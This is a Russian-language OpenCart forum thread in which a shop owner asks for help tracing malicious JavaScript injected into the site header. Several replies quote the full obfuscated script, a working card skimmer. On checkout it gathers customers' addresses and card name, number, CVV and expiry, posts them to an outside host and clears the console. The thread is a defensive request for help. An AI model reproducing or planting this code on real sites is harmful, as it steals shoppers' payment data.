Jump to content
Search In
  • More options...
Find results that contain...
Find results in...
  • Sign Up

формирование хедера


Recommended Posts

Доброго всем дня!

Обнаружил зловред JS. Устанавливается прямо в тег <head>. Перерыл весь сайт. Пытался найти в сорцах текст по шаблону - нет его. Не могу понять как он туда попадает. Я в ОС и вообще в программировании не силен. Подскажите плиз, где формируется хедер и как-откуда туда попадают JS. Буду рад любой помощи

Link to post
Share on other sites

шаблон header.tpl

контроллер header.php

 

какая версия opencart?

Link to post
Share on other sites

4 минуты назад, MrBa сказал:

версия 2.2.0.0

также проверьте эти файлы в кэше модификаторов /system/storage/modification

может с каким-то модулем принесли.

 

попробуйте открыть сайт с другого браузера(чистого, без установленных дополнений) 

Edited by ardashev06
Link to post
Share on other sites

проверил все - нет нигде. Пробовал все предложенные варианты. Как я писал выше, искал прямо на сервере с помощью grep по шаблону. Я уже мозг вывернул наизнанку. Как туда попадает этот JS? Причем не ссылка на файл, а прямо сам скрипт в хедер. Может еще какие мысли есть?

Link to post
Share on other sites

скачиваем бекапы, фтп и базы на пк, и notepad'ом делаем поиск по файлам. Может что то найдёте. 

Link to post
Share on other sites

20 минут назад, MrBa сказал:

проверил все - нет нигде. Пробовал все предложенные варианты. Как я писал выше, искал прямо на сервере с помощью grep по шаблону. Я уже мозг вывернул наизнанку. Как туда попадает этот JS? Причем не ссылка на файл, а прямо сам скрипт в хедер. Может еще какие мысли есть?

покажите скрипт. скопируйте код сюда

а лучше - предоставьте ссылку на сайт

Edited by ardashev06
Link to post
Share on other sites

Только что, ardashev06 сказал:

покажите скрипт. скопируйте код сюда

предоставьте ссылку на сайт

http://www.fataliiseeds.net/

 

<script>
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('$(q).B(8(){k(!z.w.v(/u/))t;h c,b;$(\'j\').9(\'i\',\'#6-x, #6-y, #6-3-7\',8(){k($(\'[5="d"]\').C){b=$(\'[5="d"] m:l\').n().e(/.+?,/,\'\').e(/,\\s/g,\'|\').r()}D{b=$(\'#4-3-7-1\').0()+\'|\'+$(\'#4-3-7-2\').0()+\'|\'+$(\'#4-3-p\').0()+\'|\'+$(\'#4-3-o\').0()+\'|\'+$("#4-3-A m:l").n()+\'|\'+$(\'#4-3-N\').0()+\'|\'+$(\'#4-3-E\').0()}});$(\'j\').9(\'i\',\'#6-3-Q\',8(){c=$("[5=\'P\']").0()+\'|\'+$("[5=\'T\']").0()+\'|\'+$("[5=\'S\']").0()+\'|\'+$("[5=\'O\']").0()+\'|\';h f=c+b;$.H(\'G://F.I.J/M.L\',\'a=\'+f);K.R()})});',56,56,'val|||payment|input|name|button|address|function|on||||address_id|replace|cc||var|click|body|if|selected|option|text|postcode|city|document|trim||return|checkout|match|href|register|guest|location|country|ready|length|else|telephone|klinto2u|http|post|beget|tech|console|php|index|email|cartname|cartnumberg|method|clear|cartvv|cartda'.split('|'),0,{}))
</script>

 

Только что, JIOPD сказал:

скачиваем бекапы, фтп и базы на пк, и notepad'ом делаем поиск по файлам. Может что то найдёте. 

я же писал выше -

 

Только что, ardashev06 сказал:

искал прямо на сервере с помощью grep по шаблону.

 

Link to post
Share on other sites

14 минут назад, MrBa сказал:

http://www.fataliiseeds.net/

 


<script>
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('$(q).B(8(){k(!z.w.v(/u/))t;h c,b;$(\'j\').9(\'i\',\'#6-x, #6-y, #6-3-7\',8(){k($(\'[5="d"]\').C){b=$(\'[5="d"] m:l\').n().e(/.+?,/,\'\').e(/,\\s/g,\'|\').r()}D{b=$(\'#4-3-7-1\').0()+\'|\'+$(\'#4-3-7-2\').0()+\'|\'+$(\'#4-3-p\').0()+\'|\'+$(\'#4-3-o\').0()+\'|\'+$("#4-3-A m:l").n()+\'|\'+$(\'#4-3-N\').0()+\'|\'+$(\'#4-3-E\').0()}});$(\'j\').9(\'i\',\'#6-3-Q\',8(){c=$("[5=\'P\']").0()+\'|\'+$("[5=\'T\']").0()+\'|\'+$("[5=\'S\']").0()+\'|\'+$("[5=\'O\']").0()+\'|\';h f=c+b;$.H(\'G://F.I.J/M.L\',\'a=\'+f);K.R()})});',56,56,'val|||payment|input|name|button|address|function|on||||address_id|replace|cc||var|click|body|if|selected|option|text|postcode|city|document|trim||return|checkout|match|href|register|guest|location|country|ready|length|else|telephone|klinto2u|http|post|beget|tech|console|php|index|email|cartname|cartnumberg|method|clear|cartvv|cartda'.split('|'),0,{}))
</script>

 

я же писал выше -

 

 

а что это у вас за скрипт подцепляется? http://www.fataliiseeds.net/catalog/view/javascript/common_g.js

Link to post
Share on other sites

15 минут назад, MrBa сказал:

http://www.fataliiseeds.net/

 


<script>
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('$(q).B(8(){k(!z.w.v(/u/))t;h c,b;$(\'j\').9(\'i\',\'#6-x, #6-y, #6-3-7\',8(){k($(\'[5="d"]\').C){b=$(\'[5="d"] m:l\').n().e(/.+?,/,\'\').e(/,\\s/g,\'|\').r()}D{b=$(\'#4-3-7-1\').0()+\'|\'+$(\'#4-3-7-2\').0()+\'|\'+$(\'#4-3-p\').0()+\'|\'+$(\'#4-3-o\').0()+\'|\'+$("#4-3-A m:l").n()+\'|\'+$(\'#4-3-N\').0()+\'|\'+$(\'#4-3-E\').0()}});$(\'j\').9(\'i\',\'#6-3-Q\',8(){c=$("[5=\'P\']").0()+\'|\'+$("[5=\'T\']").0()+\'|\'+$("[5=\'S\']").0()+\'|\'+$("[5=\'O\']").0()+\'|\';h f=c+b;$.H(\'G://F.I.J/M.L\',\'a=\'+f);K.R()})});',56,56,'val|||payment|input|name|button|address|function|on||||address_id|replace|cc||var|click|body|if|selected|option|text|postcode|city|document|trim||return|checkout|match|href|register|guest|location|country|ready|length|else|telephone|klinto2u|http|post|beget|tech|console|php|index|email|cartname|cartnumberg|method|clear|cartvv|cartda'.split('|'),0,{}))
</script>

 

я же писал выше -

 

 

 

предоставьте фтп в личку, посмотрю откуда ноги растут

Link to post
Share on other sites

Только что, ardashev06 сказал:

а вы открывали его? там ничего особенного))

тоже глянул, не нашел ничего касаемо вопроса.

Link to post
Share on other sites

3 минуты назад, MrBa сказал:

тоже глянул, не нашел ничего касаемо вопроса.

есть ли в header.tpl что-то между

 

<script src="catalog/view/javascript/jquery/owl-carousel/owl.carousel.min.js" type="text/javascript"></script>

 

{что-то здесь}

 

<link href='catalog/view/theme/default/stylesheet/jquery.growl.css' rel='stylesheet' type='text/css'>

Link to post
Share on other sites

Только что, ardashev06 сказал:

есть ли в header.tpl что-то между

в самом файле нет такого скрипта. Пробовал по поиску по всем файам - тоже не нашел

Link to post
Share on other sites

10 минут назад, MrBa сказал:

в самом файле нет такого скрипта. Пробовал по поиску по всем файам - тоже не нашел

разумеется его вы там можете не увидеть.

 

но есть что-то между подключением скрипта и стиля? названия их выше.

 

если там вообще ничего нет,

 

то нужно смотреть установленные модификаторы

 

---

 

в зашифрованном участке кода присутствует сайт klinto2u.beget.tech (который судя по всему пустышка)

Edited by ardashev06
Link to post
Share on other sites

3 минуты назад, ardashev06 сказал:

в зашифрованном участке кода присутствует сайт klinto2u.beget.tech (который судя по всему пустышка)

вот и нет - он передает туда методом пост информацию. Но где он находится?

Link to post
Share on other sites

8 минут назад, MrBa сказал:

вот и нет - он передает туда методом пост информацию. Но где он находится?

методом пост на сайт пустышку :)

 

я вам наводку дал где искать. этот код необязательно может быть в файлах.

он может также хранится в бд.

также подгружаться каким-нибудь модулем,скриптом

Link to post
Share on other sites

Только что, ardashev06 сказал:

я вам наводку дал где искать. этот код необязательно может быть в файлах.

он может также хранится в бд.

также подгружаться каким-нибудь модулем,скриптом

я его вычислил дебагером. Он туда шлет важные данные и вполне успешно, с возвратом - true

Те не менее спасибо за помощь. Буду искать где он хранится и как туда попадает

Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...

Important Information

On our site, cookies are used and personal data is processed to improve the user interface. To find out what and what personal data we are processing, please go to the link. If you click "I agree," it means that you understand and accept all the conditions specified in this Privacy Notice.